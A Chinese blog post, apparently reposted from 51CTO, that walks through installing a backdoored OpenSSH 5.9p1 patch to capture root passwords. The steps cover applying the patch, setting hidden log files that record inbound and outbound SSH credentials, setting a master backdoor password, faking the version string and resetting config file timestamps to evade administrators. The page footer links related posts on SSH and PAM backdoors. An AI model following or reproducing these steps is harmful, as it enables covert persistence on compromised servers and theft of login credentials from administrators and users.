OpenSSH后门获取root密码

最新推荐文章于 2024-03-08 14:15:00 发布
最新推荐文章于 2024-03-08 14:15:00 发布
阅读量376 收藏
点赞数
文章标签: 运维 开发工具
原文链接:https://yq.aliyun.com/articles/507022
版权

1. 查看sshd系统版本

    [root@huangzp2 src]# ssh -V

    OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013


2. 解压版本,其中patch为补丁包

    tar -zxvf 0x06-openssh-5.9p1.patch.tar.gz

    tar -zxvf openssh-5.9p1.tar.gz


3. 替换补丁文件,替换前备份文件

    mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old

    cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/

    cd openssh-5.9p1

    patch < sshbd5.9p1.diff # 打补丁就是替换或修改原来的文件

 wKioL1jcre7DF2LmAAAa6j47P4A974.png

   patching file auth.c # 认证

   patching file auth-pam.c #认证

   patching file auth-passwd.c #认证

   patching file canohost.c

   patching file includes.h

   patching file log.c

   patching file servconf.c # 关于sshd服务端

   patching file sshconnect2.c # 关于sshd连接

   patching file sshlogin.c # 关于登录,把root密码记录下来

   patching file version.h # 关于版本


4. 修改后门密码和记录root密码的文件夹目录

   vim includes.h

 wKioL1jcrgHAdf-eAAANgmH3xGo061.png


  #define ILOG "/usr/share/ifile"  # 记录录到本机的用户名和密码

  #define OLOG "/usr/share/ofile"  # 记录从本机登录到其他机器的用户名和密码

  #define SECRETPW "12345678"  # 后门密码


5. 编辑vim version.h,修改版本号与原来一致

    原来:OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013

 wKiom1jcrg3xQPUPAAANEwxv5rg057.png


6. 编译安装

   组件:yum install -y openssl openssl-devel pam-devel zlib zlib-devel gcc

            ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

            make -j 4 ;make install

            --prefix=/usr   # 安装目录

           --sysconfdir=/etc/ssh   # 指定sshd配置文件

           --with-pam   # pam认证

           --with-kerberos5   # kerberos认证


7. 还原新配置文件为旧配置文件时间

   说明:将ssh_config和sshd_config修改时间跟ssh_config.old和sshd_config.old一致

  touch -r/etc/ssh/ssh_config.old /etc/ssh/ssh_config   touch -r/etc/ssh/sshd_config.old /etc/ssh/sshd_config


8. 重启sshd服务

    service sshd restart


9. 验证并查看

    登录后再次查看就记录了密码,修改了密码再次登录也会记录

1)记录录到本机的用户名和密码

 wKiom1jcrieC6ujPAAAJgKVDebo956.png


2)记录从本机登录到其他机器的用户名和密码

 wKiom1jcrjXxYT4YAAALHEH91JA624.png


3)后门密码登录

 wKioL1jcrj-R5uaqAAAMhBnAks8757.png


10. 配置自动发送邮件

    ........略


    参看文献 http://www.cnblogs.com/croso/p/5280783.html











本文转自 huangzp168 51CTO博客,原文链接:http://blog.51cto.com/huangzp/1911767,如需转载请自行联系原作者
weixin_34064653
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
自动截取root密码和防暴力破解sshd密码
weixin_40501323的博客
12-31 1万+
做人要知道自己在干什么,做事要坚持 自己写的博客不是为了要装逼什么的,而是想多多了解知识 1.自动截取ootr密码 原理:客户端登陆sshd服务端,这时候换上具有木马的服务端,就可以截取登陆用户的账号和密码,为了不让管理员发现我们需要对安装的包的版本号进行修改。 安装和打补丁 (1)首先我将这俩个包传到centos7上,”0x06-openssh-5.9p1.patch.tar.
0x06-openssh-5.9p1.patch.tar.gz
02-14
"模拟劫持Root密码并发送到邮箱"所需软件包其中之一:0x06-openssh-5.9p1.patch.tar.gz,大胆放心使用,不需要积分,只求浏览博客时留下您的评论和点赞,谢谢!
擂台赛-安全攻防之使用openssh后门获取root密码实战
最新发布
A_991128a的博客
03-08 916
大家好,我是沐风晓月,我们开始组队学习了,介绍下我们的情况:这几天跟队员 迎月,虹月,心月,古月打擂台,我和心月一组,相互攻占对方服务器。终于在今早凌晨三点拿下对方服务器的权限。接下来我们第一想做的就是如何维持这个权限,还要不被对方发现。关于维持权限,我们第一时间想到的就是在对方服务器留下一个后门,搜索了很多资料,发现这个openssh后门正合我意。于是开干。。。虹月组目前还未发现他们的服务已经被植入后门漏洞,今天心月提到可以再加上一个功能:邮件发送功能,实现当虹月组登录服务器,就能收到信息。
OpenSSH后门获取root密码及防范
weixin_30340745的博客
03-15 501
OpenSSH后门获取root密码及防范 相对于Windows操作系统,Linux操作系统的密码较难获取。而很多Linux服务器都配置了Openssh服务,在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号密码,甚至可以留一个隐形的后门,达到长期控制linux服务器的目的。在很多Linux系统被入侵后都会在系统中留后门,使用OpenSS...
OpenSSH命令注入漏洞(CVE-2020-15778)
热门推荐
qq_42947816的博客
02-09 1万+
一般在特定环境下利用,比如在知道SSH账户密码后,但禁用SSH登陆或SSH连接被阻止,服务器允许使用scp传文件的情况下,可对其进行命令注入,所以如果攻击者不知道ssh账密,此漏洞无法利用。
linux: OpenSSH后门获取root密码及防范
08-05
linux后门
两个openssh间免密码登录
10-11
配置分两部分:一是对登录机的配置,二是对被登录机的配置,其中登录机为客户端,被登录机为服务端,也就是解决客户端到服务端的无密码登录问题。下述涉及到的命令,可以直接拷贝到Linux终端上执行,已全部验证通过...
LINUX下的openSSH后门的制作.txt
01-09
Linux系统安全学习
SSH2免密码登录OpenSSH
10-11
如何确定是OpenSSH还是SSH2? 执行命令“ssh -V”,通过它的输出,即可确定: SSH2 ssh: SSH Secure Shell 3.2.9.1 (non-commercial version) on OpenSSH OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010
openssh-5.9p1后门打补丁版
08-08
openssh-5.9p1后门打补丁版
openssh相关.rar
06-11
操作系统基于redhat6.5,将openssh由5.3升级为8.3,修复服务器ftp传输等漏洞,防止外部渗透性测试攻击
Linux权限维持—OpenSSH&PAM后门&SSH软连接&公私钥登录
剁椒鱼头没剁椒的博客
08-22 1821
由于密码日志文件是被隐藏的,所以可以直接使用cat去查看,这里只要管理者使用ssh进行连接就会记录密码,而这些操作都是无感的,当然若管理员会去定期排查,那么该被发现还是会被发现的,这些都是基于管理员不会定期去排查才能够持久。这里要注意一个问题就是,不一定编译就能够成功,有时候根本无法编辑,从网上找的很多资料中,都跳过直接给命令,所以这里我就提前说一下,不一定能够编译成功,不成功再次重新测试,若还是不行,就拉到吧。这里重启也可能存在问题,这个实验有时候很莫名其妙的,有时候能够测试成功,有时候测试是不成功的。
【权限维持】Linux&OpenSSH&PAM后门&SSH软链接&公私钥登录
今天是几号的博客
04-16 1437
可以找到以读写方式记录在文件中的SSH后门密码文件的位置,并通过该方法判断是否存在SSH后门。进行认证时首先确定是什么服务,然后加载相应的PAM的配置文件(位于/etc/pam.d),最后调用认证文件(于/lib/security)进行安全认证.简易利用的PAM后门也是通过修改PAM源码中认证的逻辑来达到权限维持。4、编译完后的文件在:modules/pam_unix/.libs/pam_unix.so,复制到/lib64/security中进行替换,即使用万能密码登陆,将用户名密码记录到文件中。
linux下openssh5.3漏洞,openssh漏洞修复
weixin_39612726的博客
05-16 1392
为保障在升级openssh过程中出现网络中断导致连接不上服务器,建议先安装telnet服务,当网络中断时,可通过telnet远程到服务器。一、安装telnet服务yum install xinetd 依赖yum install telnet 客户端yum install telnet-server 服务端1、开启telnet服务vim /etc/xinetd.d/telnetservice tel...
ssh后门介绍与防御
有勇气的牛排博客
08-04 1443
文章目录1 介绍2 实战演练2.1 查看版本2.2 下载SSH配置文件2.3 安装2.4 修改后门密码and文件记录2.5 编译安装2.6 摸出痕迹3 防御ssh后门 1 介绍 当拿到root权限后,一般需要维持权限(留后门),可以做openssh后门,也就是root密码,管理员一个密码,我们的后门一个密码。 2 实战演练 实验环境:Centos7 2.1 查看版本 ssh -v 可以对ssh备份配置文件,可以对后期的文件时间进行修改 cp -p /etc/ssh/ssh_config / etc/
linux下openssh5.3漏洞,linux的低版本中openssh三大漏洞的分析及修复方法
weixin_28797919的博客
05-16 1460
一:漏洞分析最近进行linux系统安全加固分析,进行漏洞扫描扫描分析,不扫不知道,一扫吓一跳,linux系统服务器的OPENSSH存在3大安全漏洞,祥如下:1:OpenSSH GSSAPI 处理远端代码执行漏洞漏洞分类 守护进程类危险级别 高影响平台OpenSSH OpenSSH < 4.4详细描述OpenSSH 4.3 之前的portable 版本存在远端代码执行漏洞. 攻击者可以利用ra...
OpenSSH
一别的博客
09-26 5921
1、OpenSSH 简介 OpenSSH这一术语指系统中使用的Secure Shell软件的软件实施。用于在远程系统上安全运行shell。如果您在可提供ssh服务的远程Linux系统中拥有用户帐户,则ssh是通常用来远程登录到该系统的命令。ssh命令也可用于在远程系统中运行命令。 常用的远程工具 telnet //远程登录协议,23/TCP 认证明文 数据传输明文 ssh //Secure SHell,应用层协议,22/TCP 通信过程及认证过程是
升级openssh后服务器拒绝密码
05-14
升级 OpenSSH 后服务器拒绝密码可能是因为新版本的 OpenSSH 默认禁用了密码登录。这是为了提高服务器的安全性而做出的改变。为了解决这个问题,你可以尝试以下几种方法: 1. 使用 SSH 密钥登录:如果你还没有使用 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值